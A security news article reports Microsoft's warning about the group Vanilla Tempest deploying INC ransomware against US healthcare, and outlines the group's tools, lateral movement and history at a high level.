Microsoft Warns of Dangerous and Debilitating INC Ransomware Targeting Healthcare Systems
Microsoft has recently issued a warning about a new ransomware threat, dubbed INC, that is targeting the U.S. healthcare sector. This revelation comes from Microsoft’s threat intelligence team, which has been closely monitoring the activities of a financially motivated hacker group, known as Vanilla Tempest (formerly DEV-0832).
Table of Contents
Vanilla Tempest and Its Tactics
Vanilla Tempest’s cyberattacks are sophisticated and involve a well-coordinated process. The group's tactics include receiving hand-offs from GootLoader infections orchestrated by the notorious threat actor Storm-0494. Following the GootLoader delivery, they use a variety of tools to gain control of target systems, including:
- Supper: A malicious backdoor program
- AnyDesk: A legitimate remote monitoring and management tool
- MEGA: A cloud storage tool used for data synchronization
Once inside the system, the attackers initiate lateral movements using Remote Desktop Protocol (RDP) and Windows Management Instrumentation (WMI) Provider Host, before ultimately deploying the INC ransomware payload.
A Growing Threat Across Multiple Sectors
Vanilla Tempest has been active since at least July 2022, previously targeting industries like education, IT, and manufacturing. In the past, they have employed notorious ransomware strains like BlackCat, Quantum Locker, Zeppelin, and Rhysida. The healthcare sector, however, has become a prime target, given its critical nature and the large amounts of sensitive data it handles.
Notably, Vanilla Tempest is also known under the alias Vice Society, a group that favors leveraging pre-existing ransomware lockers instead of developing their own, a strategy that allows them to act quickly and effectively.
Evolving Techniques to Evade Detection
Ransomware gangs are continually evolving their tactics to avoid detection. In a related development, groups like BianLian and Rhysida have been observed using tools such as Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised systems. These tools, designed to manage Azure storage, are now being repurposed for large-scale data transfers to cloud storage, making it difficult for cybersecurity teams to detect and prevent these attacks.
Protecting the Healthcare Sector
As ransomware groups continue to innovate their techniques, particularly targeting vital sectors like healthcare, organizations must remain vigilant and proactive in their cybersecurity measures. Microsoft’s timely warning emphasizes the growing need for healthcare organizations to employ robust security protocols, including up-to-date anti-malware software and secure network practices, to fend off these increasingly sophisticated threats.
By staying ahead of ransomware groups like Vanilla Tempest, the healthcare sector can better protect its valuable data and avoid becoming the next victim of this financial and data extortion scheme.